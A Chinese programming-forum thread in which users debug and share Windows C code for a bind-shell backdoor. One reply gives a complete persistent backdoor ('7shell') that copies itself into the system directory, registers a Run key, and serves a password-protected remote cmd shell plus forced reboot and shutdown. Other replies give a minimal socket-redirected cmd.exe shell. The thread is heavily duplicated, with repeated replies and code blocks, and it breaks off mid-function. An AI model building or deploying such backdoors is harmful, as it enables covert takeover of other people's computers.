#include <Winsock2.h>
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
int main(int argc, char **argv)
{
//初始化WSA
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
//建立套接字
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
//地址信息
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
//绑定地址信息
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
//监听
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
//建立管道
HANDLE hReadFile,hWritePipe;
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if(CreatePipe(&hReadFile,&hWritePipe,&sa,0) == 0)
{
printf("Create pipe error!\n");
return 0;
}
//得到cmd.exe路径
char cmdline[256] = {'0'};
GetSystemDirectory(cmdline,strlen(cmdline));
strcat(cmdline,"\\cmd.exe /c");
//得到STARTUPINFO信息,定义PROCESS_INFORMATION结构
PROCESS_INFORMATION pi;
STARTUPINFO si;
GetStartupInfo(&si);
si.hStdOutput = hReadFile;
si.hStdError = hReadFile;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
//创建客户端的套接字
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
char recvbuff[1024] = {'0'}; //接收缓冲
char sendbuff[1024] = {'0'}; //发送缓冲
DWORD toSend = 0; //要发送的字节数
//循环监听
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
//接受数据
recv(sClient,recvbuff,strlen(recvbuff),0);
//strncat(cmdline,recvbuff,strlen(recvbuff));
//创建进程
if(CreateProcess(cmdline,recvbuff,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi) == 0)
{
printf("Create process error!\n");
}
CloseHandle(hWritePipe);
//读取shell运行结果
while(ReadFile(ReadFile,sendbuff,1024,&toSend,NULL))
{
//发送
send(sClient,sendbuff,toSend,0);
}
return 0;
}
12 个解决方案
#1
这么久都没人回哦,我自己顶一下
#2
1.错误
char cmdline[256] = {'0'};
GetSystemDirectory(cmdline,strlen(cmdline));
改为
char cmdline[256] = {0};
GetSystemDirectory(cmdline, sizeof(cmdline));
2.看不出这里的管道和telnet是什么关系
3.想模拟telnet协议?telnet端口为23
4.这里貌似是socket + 管道 + 控制台
将recv的数据当成命令行通过管道发到cmd去执行,
将结果send回去
char cmdline[256] = {'0'};
GetSystemDirectory(cmdline,strlen(cmdline));
改为
char cmdline[256] = {0};
GetSystemDirectory(cmdline, sizeof(cmdline));
2.看不出这里的管道和telnet是什么关系
3.想模拟telnet协议?telnet端口为23
4.这里貌似是socket + 管道 + 控制台
将recv的数据当成命令行通过管道发到cmd去执行,
将结果send回去
#3
不是高手,错误的进入了,我离开
#4
这段代码好像是黑客编程的。。跟Telnet无关吧..
#5
哦,我的意思是,这个后门能用telnet的方法连接上,不是telnet本身,是我理解错了。
我再研究一下
#6
telnet不支持管道,你需要在控制的机器上实现telnet客户端。
#7
先丢段代码,在win7下可能有问题。
#include <winsock2.h>
#pragma comment(lib,"Ws2_32")
SOCKET clientFD;
char del[]="\10";
char password[]="chris7";
char helpmess[]=
"? --get help"
"\nshell --get remote cmd shell"
"\nreboot --reboot remote computer"
"\nshutdown --shutdown remote computer"
"\nquit --quit, can connect again"
"\nexitshell --backdoor exit\n";
int main(){
//autorun
char ExeFile[MAX_PATH];
char TempPath[MAX_PATH];
GetModuleFileName(NULL,ExeFile,MAX_PATH);
GetSystemDirectory(TempPath,MAX_PATH);
strcat(TempPath,"\\7shell.exe");
CopyFile(ExeFile,TempPath,FALSE);
HKEY key;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS){
RegSetValueEx(key,"7shell",0,REG_SZ,(BYTE *)TempPath,lstrlen(TempPath));
RegCloseKey(key);
}
WSADATA ws;
SOCKET listenFD;
char Buff[256],cmd[256];
unsigned long lBytesRead;
WSAStartup(MAKEWORD(2,2),&ws);
listenFD=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
struct sockaddr_in server;
server.sin_family=AF_INET;
server.sin_port=htons(617);
server.sin_addr.s_addr=ADDR_ANY;
bind(listenFD,(sockaddr *)&server,sizeof(server));
listen(listenFD,2);
int iAddrSize=sizeof(server);
wait:
clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
//check password
send(clientFD,"Password:",sizeof("Password:"),0);
lBytesRead=0;
while(lBytesRead<256){
if(recv(clientFD,Buff,1,0)==SOCKET_ERROR){
closesocket(clientFD);
goto wait;
}
cmd[lBytesRead]=Buff[0];
if(Buff[0]==0xa||Buff[0]==0xd){
cmd[lBytesRead]=0;
break;
}
lBytesRead++;
cmd[256]='\0';
}
if(strcmp(cmd,password)!=0){
closesocket(clientFD);
goto wait;
}
int infosize=sizeof("Welcome to 7shell! Type ? to get help.\n");
send(clientFD,"Welcome to 7shell! Type ? to get help.\n\10",infosize+1,0);
send(clientFD,del,1,0);
send(clientFD,"7shell>",sizeof("7shell>"),0);
while(1){
ZeroMemory(cmd,256);
lBytesRead=0;
while(lBytesRead<256){
if(recv(clientFD,Buff,1,0)==SOCKET_ERROR){
closesocket(clientFD);
goto wait;
}
cmd[lBytesRead]=Buff[0];
if(Buff[0]==0xa||Buff[0]==0xd){
cmd[lBytesRead]=0;
break;}
lBytesRead++;
cmd[256]='\0';
}
//check cmd
if(strcmp(cmd,"?")==0){
send(clientFD,helpmess,sizeof(helpmess),0);
send(clientFD,del,1,0);
}
else if(strcmp(cmd,"shell")==0){
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)clientFD;
PROCESS_INFORMATION ProcessInformation;
if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation)){
send(clientFD,"Fail!\n",sizeof("Fail!\n"),0);
send(clientFD,del,1,0);
}
WaitForSingleObject(ProcessInformation.hProcess,INFINITE);
TerminateProcess(ProcessInformation.hProcess,0);
CloseHandle(ProcessInformation.hProcess);
}
else if(strcmp(cmd,"reboot")==0){
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
if(GetLastError()!=ERROR_SUCCESS){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else if(!ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
send(clientFD,"Success!",sizeof("Success"),0);
send(clientFD,del,1,0);
}
}
}
else if(strcmp(cmd,"shutdown")==0){
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
if(GetLastError() != ERROR_SUCCESS){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else if(!ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
send(clientFD,"Success!",sizeof("Success!"),0);
send(clientFD,del,1,0);
}
}
}
else if(strcmp(cmd,"quit")==0){
send(clientFD,"Success!",sizeof("Success!"),0);
closesocket(clientFD);
goto wait;
}
else if(strcmp(cmd,"exitshell")==0){
send(clientFD,"Success!",sizeof("Success!"),0);
closesocket(clientFD);
closesocket(listenFD);
goto end;
}
else if(strlen(cmd)){
send(clientFD,"Bad command! See help:\n",sizeof("Bad command! See help:\n"),0);
send(clientFD,helpmess,sizeof(helpmess),0);
send(clientFD,del,1,0);
}
else
;
send(clientFD,"7shell>",sizeof("7shell>"),0);
}
end:
return 0;
}
#8
核心部分可能只需要这样,并不需要管道,或者把一个socket当作管道也可以的。
#include <Winsock2.h>
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
bool EnableProcessToken(const WCHAR* szType)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* elevation the privilege of current process. */
if(!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
return false;
::LookupPrivilegeValueW(NULL, szType, &luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
return false;
return true;
}
int main(int argc, char **argv)
{
if (!EnableProcessToken(SE_DEBUG_NAME))
{
printf("EnableProcessToken faild;\n");
}
//初始化WSA
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
//建立套接字
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
//地址信息
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
//绑定地址信息
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
//监听
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
//创建客户端的套接字
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
//循环监听
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
//得到STARTUPINFO信息,定义PROCESS_INFORMATION结构
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)sClient;
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
if(!CreateProcess( NULL, // No module name (use command line)
L"C:\\Windows\\System32\\cmd.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
1, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi ) // Pointer to PROCESS_INFORMATION structure
)
{
printf( "CreateProcess failed (%d)\n", GetLastError());
return -1;
}
else
{
printf( "CreateProcess Ok");
}
WaitForSingleObject(pi.hProcess,INFINITE);
TerminateProcess(pi.hProcess,0);
CloseHandle(pi.hProcess);
return 0;
}
#9
个人认为几个有问题的地方。
1。初始化char数组用0
2.si.hStdOutput = hReadFile;
si.hStdError = hReadFile;????这里有问题 还有cmd的input在哪里
3。字符串操作尽量TCHAR之类的宽字符,字符串函数函数也是一样,windwos via如是说!!!
1。初始化char数组用0
2.si.hStdOutput = hReadFile;
si.hStdError = hReadFile;????这里有问题 还有cmd的input在哪里
3。字符串操作尽量TCHAR之类的宽字符,字符串函数函数也是一样,windwos via如是说!!!
#10
干嘛要写代码?直接打开telnet server服务不就行了。
#11
#include <Winsock2.h>
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
bool EnableProcessToken(const WCHAR* szType)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* elevation the privilege of current process. */
if(!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
return false;
::LookupPrivilegeValueW(NULL, szType, &luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
return false;
return true;
}
int main(int argc, char **argv)
{
if (!EnableProcessToken(SE_DEBUG_NAME))
{
printf("EnableProcessToken faild;\n");
}
//初始化WSA
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
//建立套接字
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
//地址信息
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
//绑定地址信息
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
//监听
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
//创建客户端的套接字
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
//循环监听
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
//得到STARTUPINFO信息,定义PROCESS_INFORMATION结构
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)sClient;
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
if(!CreateProcess( NULL, // No module name (use command line)
L"C:\\Windows\\System32\\cmd.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
1, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi ) // Pointer to PROCESS_INFORMATION structure
)
{
printf( "CreateProcess failed (%d)\n", GetLastError());
return -1;
}
else
{
printf( "CreateProcess Ok");
}
WaitForSingleObject(pi.hProcess,INFINITE);
TerminateProcess(pi.hProcess,0);
CloseHandle(pi.hProcess);
return 0;
}
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
bool EnableProcessToken(const WCHAR* szType)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* elevation the privilege of current process. */
if(!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
return false;
::LookupPrivilegeValueW(NULL, szType, &luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
return false;
return true;
}
int main(int argc, char **argv)
{
if (!EnableProcessToken(SE_DEBUG_NAME))
{
printf("EnableProcessToken faild;\n");
}
//初始化WSA
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
//建立套接字
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
//地址信息
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
//绑定地址信息
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
//监听
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
//创建客户端的套接字
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
//循环监听
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
//得到STARTUPINFO信息,定义PROCESS_INFORMATION结构
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)sClient;
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
if(!CreateProcess( NULL, // No module name (use command line)
L"C:\\Windows\\System32\\cmd.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
1, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi ) // Pointer to PROCESS_INFORMATION structure
)
{
printf( "CreateProcess failed (%d)\n", GetLastError());
return -1;
}
else
{
printf( "CreateProcess Ok");
}
WaitForSingleObject(pi.hProcess,INFINITE);
TerminateProcess(pi.hProcess,0);
CloseHandle(pi.hProcess);
return 0;
}
#12
这个程序编译后执行,telnet上去,为什么没有任何返回?执行命令也没有返回,或者返回干脆是乱码~
#1
这么久都没人回哦,我自己顶一下
#2
1.错误
char cmdline[256] = {'0'};
GetSystemDirectory(cmdline,strlen(cmdline));
改为
char cmdline[256] = {0};
GetSystemDirectory(cmdline, sizeof(cmdline));
2.看不出这里的管道和telnet是什么关系
3.想模拟telnet协议?telnet端口为23
4.这里貌似是socket + 管道 + 控制台
将recv的数据当成命令行通过管道发到cmd去执行,
将结果send回去
char cmdline[256] = {'0'};
GetSystemDirectory(cmdline,strlen(cmdline));
改为
char cmdline[256] = {0};
GetSystemDirectory(cmdline, sizeof(cmdline));
2.看不出这里的管道和telnet是什么关系
3.想模拟telnet协议?telnet端口为23
4.这里貌似是socket + 管道 + 控制台
将recv的数据当成命令行通过管道发到cmd去执行,
将结果send回去
#3
不是高手,错误的进入了,我离开
#4
这段代码好像是黑客编程的。。跟Telnet无关吧..
#5
哦,我的意思是,这个后门能用telnet的方法连接上,不是telnet本身,是我理解错了。
我再研究一下
#6
telnet不支持管道,你需要在控制的机器上实现telnet客户端。
#7
先丢段代码,在win7下可能有问题。
#include <winsock2.h>
#pragma comment(lib,"Ws2_32")
SOCKET clientFD;
char del[]="\10";
char password[]="chris7";
char helpmess[]=
"? --get help"
"\nshell --get remote cmd shell"
"\nreboot --reboot remote computer"
"\nshutdown --shutdown remote computer"
"\nquit --quit, can connect again"
"\nexitshell --backdoor exit\n";
int main(){
//autorun
char ExeFile[MAX_PATH];
char TempPath[MAX_PATH];
GetModuleFileName(NULL,ExeFile,MAX_PATH);
GetSystemDirectory(TempPath,MAX_PATH);
strcat(TempPath,"\\7shell.exe");
CopyFile(ExeFile,TempPath,FALSE);
HKEY key;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS){
RegSetValueEx(key,"7shell",0,REG_SZ,(BYTE *)TempPath,lstrlen(TempPath));
RegCloseKey(key);
}
WSADATA ws;
SOCKET listenFD;
char Buff[256],cmd[256];
unsigned long lBytesRead;
WSAStartup(MAKEWORD(2,2),&ws);
listenFD=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
struct sockaddr_in server;
server.sin_family=AF_INET;
server.sin_port=htons(617);
server.sin_addr.s_addr=ADDR_ANY;
bind(listenFD,(sockaddr *)&server,sizeof(server));
listen(listenFD,2);
int iAddrSize=sizeof(server);
wait:
clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
//check password
send(clientFD,"Password:",sizeof("Password:"),0);
lBytesRead=0;
while(lBytesRead<256){
if(recv(clientFD,Buff,1,0)==SOCKET_ERROR){
closesocket(clientFD);
goto wait;
}
cmd[lBytesRead]=Buff[0];
if(Buff[0]==0xa||Buff[0]==0xd){
cmd[lBytesRead]=0;
break;
}
lBytesRead++;
cmd[256]='\0';
}
if(strcmp(cmd,password)!=0){
closesocket(clientFD);
goto wait;
}
int infosize=sizeof("Welcome to 7shell! Type ? to get help.\n");
send(clientFD,"Welcome to 7shell! Type ? to get help.\n\10",infosize+1,0);
send(clientFD,del,1,0);
send(clientFD,"7shell>",sizeof("7shell>"),0);
while(1){
ZeroMemory(cmd,256);
lBytesRead=0;
while(lBytesRead<256){
if(recv(clientFD,Buff,1,0)==SOCKET_ERROR){
closesocket(clientFD);
goto wait;
}
cmd[lBytesRead]=Buff[0];
if(Buff[0]==0xa||Buff[0]==0xd){
cmd[lBytesRead]=0;
break;}
lBytesRead++;
cmd[256]='\0';
}
//check cmd
if(strcmp(cmd,"?")==0){
send(clientFD,helpmess,sizeof(helpmess),0);
send(clientFD,del,1,0);
}
else if(strcmp(cmd,"shell")==0){
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)clientFD;
PROCESS_INFORMATION ProcessInformation;
if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation)){
send(clientFD,"Fail!\n",sizeof("Fail!\n"),0);
send(clientFD,del,1,0);
}
WaitForSingleObject(ProcessInformation.hProcess,INFINITE);
TerminateProcess(ProcessInformation.hProcess,0);
CloseHandle(ProcessInformation.hProcess);
}
else if(strcmp(cmd,"reboot")==0){
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
if(GetLastError()!=ERROR_SUCCESS){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else if(!ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
send(clientFD,"Success!",sizeof("Success"),0);
send(clientFD,del,1,0);
}
}
}
else if(strcmp(cmd,"shutdown")==0){
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
if(GetLastError() != ERROR_SUCCESS){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else if(!ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
send(clientFD,"Success!",sizeof("Success!"),0);
send(clientFD,del,1,0);
}
}
}
else if(strcmp(cmd,"quit")==0){
send(clientFD,"Success!",sizeof("Success!"),0);
closesocket(clientFD);
goto wait;
}
else if(strcmp(cmd,"exitshell")==0){
send(clientFD,"Success!",sizeof("Success!"),0);
closesocket(clientFD);
closesocket(listenFD);
goto end;
}
else if(strlen(cmd)){
send(clientFD,"Bad command! See help:\n",sizeof("Bad command! See help:\n"),0);
send(clientFD,helpmess,sizeof(helpmess),0);
send(clientFD,del,1,0);
}
else
;
send(clientFD,"7shell>",sizeof("7shell>"),0);
}
end:
return 0;
}
#8
核心部分可能只需要这样,并不需要管道,或者把一个socket当作管道也可以的。
#include <Winsock2.h>
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
bool EnableProcessToken(const WCHAR* szType)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* elevation the privilege of current process. */
if(!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
return false;
::LookupPrivilegeValueW(NULL, szType, &luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
return false;
return true;
}
int main(int argc, char **argv)
{
if (!EnableProcessToken(SE_DEBUG_NAME))
{
printf("EnableProcessToken faild;\n");
}
//初始化WSA
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
//建立套接字
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
//地址信息
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
//绑定地址信息
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
//监听
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
//创建客户端的套接字
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
//循环监听
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
//得到STARTUPINFO信息,定义PROCESS_INFORMATION结构
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)sClient;
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
if(!CreateProcess( NULL, // No module name (use command line)
L"C:\\Windows\\System32\\cmd.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
1, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi ) // Pointer to PROCESS_INFORMATION structure
)
{
printf( "CreateProcess failed (%d)\n", GetLastError());
return -1;
}
else
{
printf( "CreateProcess Ok");
}
WaitForSingleObject(pi.hProcess,INFINITE);
TerminateProcess(pi.hProcess,0);
CloseHandle(pi.hProcess);
return 0;
}
#9
个人认为几个有问题的地方。
1。初始化char数组用0
2.si.hStdOutput = hReadFile;
si.hStdError = hReadFile;????这里有问题 还有cmd的input在哪里
3。字符串操作尽量TCHAR之类的宽字符,字符串函数函数也是一样,windwos via如是说!!!
1。初始化char数组用0
2.si.hStdOutput = hReadFile;
si.hStdError = hReadFile;????这里有问题 还有cmd的input在哪里
3。字符串操作尽量TCHAR之类的宽字符,字符串函数函数也是一样,windwos via如是说!!!
#10
干嘛要写代码?直接打开telnet server服务不就行了。
#11
#include <Winsock2.h>
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
bool EnableProcessToken(const WCHAR* szType)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* elevation the privilege of current process. */
if(!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
return false;
::LookupPrivilegeValueW(NULL, szType, &luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
